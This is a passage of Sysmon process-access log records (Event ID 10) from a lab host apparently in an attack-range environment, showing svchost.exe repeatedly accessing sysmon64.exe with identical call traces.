C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4236,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4237,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4238,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4239,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4240,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4241,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4242,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:41.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4243,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:41.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 